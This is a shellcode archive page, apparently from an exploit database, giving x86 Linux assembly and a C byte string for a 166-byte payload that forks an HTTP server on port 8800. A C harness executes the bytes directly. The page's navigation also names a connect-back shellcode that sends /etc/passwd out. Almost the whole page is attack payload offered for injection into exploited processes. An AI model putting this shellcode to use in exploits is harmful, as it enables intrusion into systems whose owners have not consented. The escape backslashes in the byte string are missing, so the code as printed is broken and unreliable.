[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 shellcode that forks a HTTP Server on port tcp/8800 166 bytes
# Published : 2009-09-15
# Author : XenoMuta
# Previous Title : freebsd/x86 connect back.send.exit /etc/passwd 112 bytes
# Next Title : linux/x86 listens for shellcode on tcp/5555 and jumps to it
/*
_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ / __ / __ / /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|____/_/ /_/____/_/ /_/__,_/__/__,_/
xenomutax40phreakerx2enet
http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
Description:
a linux/x86 shellcode that forks a HTTP Server on port tcp/8800
OS: Linux
Arch: x86
Length: 166 bytes
Author: XenoMuta
hola at:
str0k3, garay, fr1t0l4y, emra.
- God bless you all -
==== SOURCE CODE ====
.globl _start
_start:
xor %eax, %eax
mov $0x02, %al
int $0x80
test %eax, %eax
jz socket
xor %eax, %eax
incb %al
int $0x80
txt:
pop %ecx
movb $27, %dl
int $0x80
close:
movb $0x6, %al
mov %esi, %ebx
int $0x80
exit:
mov $0x01, %al
xor %ebx, %ebx
int $0x80
socketcall:
pop %esi
mov $0x66, %al
incb %bl
mov %esp, %ecx
int $0x80
jmp *%esi
socket:
cltd
xor %eax, %eax
xor %ebx, %ebx
push $0x6
push $0x1
push $0x2
call socketcall
bind:
mov %eax, %edi
xor %edx, %edx
push %edx
pushw $0x6022
pushw %bx
mov %esp, %ecx
push $0x10
push %ecx
push %edi
call socketcall
listen:
inc %bl
push $0x05
push %edi
call socketcall
accept:
xor %ecx, %ecx
push %edx
push %edx
push %edi
call socketcall
fork:
mov %eax, %esi
xor %eax, %eax
mov $0x02, %al
int $0x80
test %eax, %eax
jz write
xor %eax, %eax
mov $0x06, %al
mov %esi, %ebx
int $0x80
xor %eax, %eax
xor %ebx, %ebx
mov $0x04, %bl
jmp accept
write:
mov %esi, %ebx
mov $0x04, %al
call txt
.string "HTTP/1.0 200rnrn<h1>:)</h1>"
==== SOURCE CODE ====
*/
char shellcode[] = "x31xc0xb0x02xcdx80x85xc0x74x22x31xc0xfexc0xcdx80x59xb2x1bxcdx80xb0x06x89xf3xcdx80xb0x01x31xdbxcdx80x5exb0x66xfexc3x89xe1xcdx80xffxe6x99x31xc0x31xdbx6ax06x6ax01x6ax02xe8xe5xffxffxffx89xc7x31xd2x52x66x68x22x60x66x53x89xe1x6ax10x51x57xe8xcfxffxffxffxfexc3x6ax05x57xe8xc5xffxffxffx31xc9x52x52x57xe8xbbxffxffxffx89xc6x31xc0xb0x02xcdx80x85xc0x74x10x31xc0xb0x06x89xf3xcdx80x31xc0x31xdbxb3x04xebxdax89xf3xb0x04xe8x85xffxffxffx48x54x54x50x2fx31x2ex30x20x32x30x30x0dx0ax0dx0ax3cx68x31x3ex3ax29x3cx2fx68x31x3e";
int main ()
{
printf("Length: %d bytesn", strlen(shellcode));
int (*sc)() = (int (*)())shellcode;
sc();
return 0;
}
// www.Syue.com [2009-09-15]